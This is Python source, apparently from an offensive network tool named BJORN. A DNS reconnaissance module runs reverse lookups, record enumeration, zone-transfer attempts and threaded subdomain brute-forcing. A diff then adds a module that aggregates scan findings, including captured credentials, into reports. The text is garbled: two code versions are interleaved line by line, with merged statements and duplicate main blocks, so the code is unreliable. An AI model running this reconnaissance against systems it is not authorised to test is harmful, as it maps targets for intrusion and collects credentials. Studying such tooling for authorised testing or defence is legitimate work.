Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
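The last-two / last-three rule in `_extract_domain` can be checked standalone (compound-TLD set truncated for brevity; helper name is illustrative — a complete implementation would consult the Public Suffix List):

```python
COMPOUND_TLDS = {"co.uk", "com.au", "org.uk", "ac.uk"}

def registerable_domain(hostname):
    # e.g. 'mail.sub.example.com' -> 'example.com'; 'a.example.co.uk' -> 'example.co.uk'
    parts = hostname.strip().rstrip(".").split(".")
    if len(parts) < 2:
        return None
    if len(parts) >= 3 and f"{parts[-2]}.{parts[-1]}".lower() in COMPOUND_TLDS:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])
```

Single-label names such as `localhost` (and raw IPs, filtered separately in the method above) yield None.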
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
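The socket fallback path is essentially `getaddrinfo` plus dedupe; an isolated sketch of the A-record branch (function name is illustrative):

```python
import socket

def a_records(domain):
    # IPv4 addresses via getaddrinfo, mirroring the fallback used when dnspython is absent
    out = []
    try:
        for info in socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM):
            addr = info[4][0]
            if addr not in out:
                out.append(addr)
    except (socket.gaierror, OSError):
        pass  # unresolvable names simply yield an empty list
    return out
```

Unlike a real A lookup, `getaddrinfo` may also consult `/etc/hosts`, which is usually acceptable for recon triage.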
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
try:
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e: except Exception as e:
logging.error(f"Failed to load settings: {e}") logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return {}
def main(): return records
parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
parser.add_argument("-d", "--domain", help="Target domain for enumeration")
parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
args = parser.parse_args()
settings = load_settings() def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
domain = args.domain or settings.get("domain") """Resolve a nameserver hostname to an IP address."""
wordlist = args.wordlist or settings.get("wordlist") ns = nameserver.strip().rstrip(".")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
recursive = args.recursive or settings.get("recursive")
if not domain: # Check if already an IP
logging.error("Domain is required. Use -d or save it in settings") try:
return socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
save_settings(domain, wordlist, output_dir, threads, recursive) # Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
pillager = DNSPillager( # Socket fallback
domain=domain, try:
wordlist=wordlist, result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
output_dir=output_dir, if result:
threads=threads, return result[0][4][0]
recursive=recursive except Exception:
) pass
pillager.execute()
return None
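The IP-literal check above relies on `socket.inet_aton`, which returns normally for any parseable dotted-quad string and raises `OSError` otherwise. A minimal standalone sketch of that check (the `is_ipv4_literal` name is ours, not from the module); note that `inet_aton` is lenient and also accepts shorthand forms such as `127.1`:

```python
import socket

def is_ipv4_literal(host: str) -> bool:
    """Return True if host parses as an IPv4 address literal."""
    try:
        # inet_aton raises OSError for anything that is not a numeric IPv4 form
        socket.inet_aton(host)
        return True
    except OSError:
        return False
```

This is why `_resolve_ns_to_ip` can short-circuit before doing any DNS lookup: a nameserver already given as an address is returned as-is.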
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
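The wordlist filter above drops blank lines and comments. One subtlety worth noting: the `#` check runs on the raw line, not the stripped one, so an indented comment survives the filter. A small sketch mirroring that behavior (the `parse_wordlist` name is ours):

```python
def parse_wordlist(lines):
    """Keep non-empty, non-comment entries, mirroring the filter used above."""
    # startswith("#") is tested on the raw line, so "  # foo" is NOT filtered
    return [line.strip() for line in lines if line.strip() and not line.startswith("#")]
```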
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
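The progress update inside `check_subdomain` maps completion linearly onto the 45–95% band reserved for subdomain enumeration. Extracted as a pure function (the `enum_progress` name is ours):

```python
def enum_progress(completed: int, total: int) -> int:
    """Map subdomain-enumeration completion onto the 45-95% progress band."""
    pct = 45 + int((completed / total) * 50)
    # Clamp so the display never reports done before the phase actually ends
    return min(pct, 95)
```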
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
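`_save_results` derives a filesystem-safe filename by replacing both `:` (IPv6) and `.` separators with underscores before appending a timestamp. A sketch of just that path-building step (the `results_path` helper name is ours):

```python
import datetime
import os

def results_path(output_dir: str, ip: str) -> str:
    """Build a filesystem-safe results filename for an IPv4 or IPv6 address."""
    safe_ip = ip.replace(":", "_").replace(".", "_")
    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
    return os.path.join(output_dir, f"dns_{safe_ip}_{timestamp}.json")
```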
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
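The hostname column is stored as a `;`-separated set, and `_update_db_hostname` merges into it without duplicating entries. The merge logic, isolated as a pure function (the `merge_hostnames` name is ours):

```python
def merge_hostnames(existing: str, new_hostname: str) -> str:
    """Merge a hostname into a ';'-separated list, deduplicated and sorted."""
    names = set(h.strip() for h in (existing or "").split(";") if h.strip())
    names.add(new_hostname)
    return ";".join(sorted(names))
```

Sorting keeps the stored string stable across runs, so repeated merges of the same data never rewrite the row with a different ordering.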
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    shared_data = SharedData()
    try:
        pillager = DNSPillager(shared_data)
        logger.info("DNS Pillager module ready (CLI mode).")
        rows = shared_data.read_data()
        for row in rows:
            ip = row.get("IPs") or row.get("ip")
            if not ip:
                continue
            port = row.get("port") or 53
            logger.info(f"Execute DNSPillager on {ip}:{port} ...")
            status = pillager.execute(ip, str(port), row, "dns_pillager")
            if status == "success":
                logger.success(f"DNS recon successful for {ip}:{port}.")
            elif status == "interrupted":
                logger.warning(f"DNS recon interrupted for {ip}:{port}.")
                break
            else:
                logger.failed(f"DNS recon failed for {ip}:{port}.")
        logger.info("DNS Pillager CLI execution completed.")
    except Exception as e:
        logger.error(f"Error: {e}")
        exit(1)

if __name__ == "__main__":
    main()


@@ -1,457 +1,165 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""

import os
import json
import glob
import threading
import time
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional

from logger import Logger

logger = Logger(name="freya_harvest.py")

# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10  # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"

# Data collection and organization tool to aggregate findings from other modules.
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input   Input directory to monitor (default: /home/bjorn/Bjorn/data/output/).
# -o, --output  Output directory for reports (default: /home/bjorn/Bjorn/data/reports).
# -f, --format  Output format (json, html, md, default: all).
# -w, --watch   Watch for new findings in real-time.
# -c, --clean   Clean old data before processing.

import os
import json
import argparse
from datetime import datetime
import logging
import time
import shutil
import glob
import watchdog.observers
import watchdog.events
import markdown
import jinja2
from collections import defaultdict

b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Default settings
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")

# HTML template for reports
HTML_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
    <title>Bjorn Reconnaissance Report</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; }
        .section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
        .vuln-high { background-color: #ffebee; }
        .vuln-medium { background-color: #fff3e0; }
        .vuln-low { background-color: #f1f8e9; }
        table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
        th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
        th { background-color: #f5f5f5; }
        h1, h2, h3 { color: #333; }
        .metadata { color: #666; font-style: italic; }
        .timestamp { font-weight: bold; }
    </style>
</head>
<body>
    <h1>Bjorn Reconnaissance Report</h1>
    <div class="metadata">
        <p class="timestamp">Generated: {{ timestamp }}</p>
    </div>
    {% for section in sections %}
    <div class="section">
        <h2>{{ section.title }}</h2>
        {{ section.content }}
    </div>
    {% endfor %}
</body>
</html>
"""

b_args = {
    "input_dir": {
        "type": "text",
        "label": "Input Data Dir",
        "default": "/home/bjorn/Bjorn/data/output"
    },
    "output_dir": {
        "type": "text",
        "label": "Reports Dir",
        "default": "/home/bjorn/Bjorn/data/reports"
    },
    "watch": {
        "type": "checkbox",
        "label": "Continuous Watch",
        "default": True
    },
    "format": {
        "type": "select",
        "label": "Report Format",
        "choices": ["json", "md", "all"],
        "default": "all"
    }
}
class FreyaHarvest:
    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.data = defaultdict(list)
        self.lock = threading.Lock()
        self.last_scan_time = 0

    def _collect_data(self, input_dir):
        """Scan directories for JSON findings."""
        categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
        new_findings = 0

class FreyaHarvest:
    def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
                 formats=None, watch_mode=False, clean=False):
        self.input_dir = input_dir
        self.output_dir = output_dir
        self.formats = formats or ['json', 'html', 'md']
        self.watch_mode = watch_mode
        self.clean = clean
        self.data = defaultdict(list)
        self.observer = None

    def clean_directories(self):
        """Clean output directory if requested."""
        if self.clean and os.path.exists(self.output_dir):
            shutil.rmtree(self.output_dir)
            os.makedirs(self.output_dir)
            logging.info(f"Cleaned output directory: {self.output_dir}")
def collect_wifi_data(self):
"""Collect WiFi-related findings."""
try:
wifi_dir = os.path.join(self.input_dir, "wifi")
if os.path.exists(wifi_dir):
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['wifi'].append(data)
except Exception as e:
logging.error(f"Error collecting WiFi data: {e}")
def collect_network_data(self):
"""Collect network topology and host findings."""
try:
network_dir = os.path.join(self.input_dir, "topology")
if os.path.exists(network_dir):
for file in glob.glob(os.path.join(network_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['network'].append(data)
except Exception as e:
logging.error(f"Error collecting network data: {e}")
def collect_vulnerability_data(self):
"""Collect vulnerability findings."""
try:
vuln_dir = os.path.join(self.input_dir, "webscan")
if os.path.exists(vuln_dir):
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['vulnerabilities'].append(data)
except Exception as e:
logging.error(f"Error collecting vulnerability data: {e}")
def collect_credential_data(self):
"""Collect credential findings."""
try:
cred_dir = os.path.join(self.input_dir, "packets")
if os.path.exists(cred_dir):
for file in glob.glob(os.path.join(cred_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['credentials'].append(data)
except Exception as e:
logging.error(f"Error collecting credential data: {e}")
def collect_data(self):
"""Collect all data from various sources."""
self.data.clear() # Reset data before collecting
self.collect_wifi_data()
self.collect_network_data()
self.collect_vulnerability_data()
self.collect_credential_data()
logging.info("Data collection completed")
def generate_json_report(self):
"""Generate JSON format report."""
try:
report = {
'timestamp': datetime.now().isoformat(),
'findings': dict(self.data)
}
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
with open(output_file, 'w') as f:
json.dump(report, f, indent=4)
logging.info(f"JSON report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating JSON report: {e}")
def generate_html_report(self):
"""Generate HTML format report."""
try:
template = jinja2.Template(HTML_TEMPLATE)
sections = []
# Network Section
if self.data['network']:
content = "<h3>Network Topology</h3>"
for topology in self.data['network']:
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
content += "</table>"
sections.append({"title": "Network Information", "content": content})
# WiFi Section
if self.data['wifi']:
content = "<h3>WiFi Findings</h3>"
for wifi_data in self.data['wifi']:
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
for network in wifi_data.get('networks', []):
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
content += f"<td>{network.get('security', 'Unknown')}</td>"
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "WiFi Networks", "content": content})
# Vulnerabilities Section
if self.data['vulnerabilities']:
content = "<h3>Discovered Vulnerabilities</h3>"
for vuln_data in self.data['vulnerabilities']:
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
for vuln in vuln_data.get('findings', []):
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
content += f"<tr class='{severity_class}'>"
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
content += f"<td>{vuln.get('description', 'No description')}</td>"
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
content += "</table>"
sections.append({"title": "Vulnerabilities", "content": content})
# Credentials Section
if self.data['credentials']:
content = "<h3>Discovered Credentials</h3>"
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
content += f"<td>{cred.get('source', 'Unknown')}</td>"
content += f"<td>{cred.get('service', 'Unknown')}</td>"
content += f"<td>{cred.get('username', 'Unknown')}</td>"
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "Credentials", "content": content})
# Generate HTML
os.makedirs(self.output_dir, exist_ok=True)
html = template.render(
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
sections=sections
)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
with open(output_file, 'w') as f:
f.write(html)
logging.info(f"HTML report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating HTML report: {e}")
def generate_markdown_report(self):
"""Generate Markdown format report."""
try:
md_content = [
"# Bjorn Reconnaissance Report",
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
]
# Network Section
if self.data['network']:
md_content.append("## Network Information")
for topology in self.data['network']:
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
md_content.append("\n| IP | MAC | Open Ports | Status |")
md_content.append("|-------|-------|------------|---------|")
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
